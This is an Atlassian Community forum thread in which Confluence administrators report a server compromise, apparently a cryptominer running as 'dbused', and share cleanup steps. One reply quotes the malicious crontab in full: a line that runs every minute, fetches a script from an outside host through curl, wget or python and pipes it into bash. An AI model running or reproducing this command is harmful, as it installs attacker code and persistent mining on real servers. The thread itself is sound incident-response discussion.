Forums

Articles
Create
cancel
Showing results for 
Search instead for 
Did you mean: 

Virus Confluence September 1 - High load CPU consume

Gustavo Jimenez
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
September 1, 2021

Today, we saw a weird behaviour in our confluence in that dbused command is constantly executed in os system.

 

we see in this link https://community.atlassian.com/t5/Confluence-questions/No-access-to-Conlfuence-Webpage-100-CPU-usage-from-quot-dbused/qaq-p/1793393#U1793634

that is a problem in various confluence. we found a crontab that get a URL and allow it delete

 

do you have a solutions for this problem?

 

we had confluence 6.15.7

5 answers

1 accepted

0 votes
Answer accepted
Игорь Гаврилов
I'm New Here
I'm New Here
Those new to the Atlassian Community have posted less than three times. Give them a warm welcome!
September 1, 2021

Virus

/var/spool/cron/crontabs/confluence

# DO NOT EDIT THIS FILE - edit the master and reinstall.

# (- installed on Wed Sep  1 18:32:32 2021)

# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)

* * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib3 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

~                                             

1 vote
Kamil Beer September 2, 2021

Hey Gustavo,

after some time struggling, it seems that, at least for some time, I have managed to shut the miner, or whatever it was, down, and get Confluence running. What I did I did in a very short time window.

1) I removed the cron entry for confluence, which was located in /var/spool/cron

2) I killed all the suspicious processes, like the dbused

3) I applied Atlassian's patch.

From then, dbuserd didn't start, nor did the cronfile generate again.

Finally, I removed all the suspicious files from /tmp.

I'm now going to apply the LTE version.

0 votes
webenginenl
Contributor
September 6, 2021 edited

Some files are set with chattr flags and harder to remove.

0 votes
Jasper Golze September 3, 2021

Same here, thanks for help.

0 votes
Kamil Beer September 2, 2021

Same here. I remove the crontab entry (found in /var/spool/cron/confluence), yet the crontab regenerates.

Suggest an answer

Log in or Sign up to answer
DEPLOYMENT TYPE
CLOUD
PERMISSIONS LEVEL
Product Admin
TAGS
atlassian, out of office, loom, confluence, async collaboration, meeting recaps, remote teamwork, team alignment, knowledge sharing, AI-powered notes, productivity tools, workforce continuity, teamwork collection

Put your meeting notes on autopilot with Loom + Confluence

AI-powered meeting notes keep work moving even if you’re out of the office. Enjoy your well-deserved time off and return refreshed, confident you’ll catch up in no time.

Learn more
AUG Leaders

Atlassian Community Events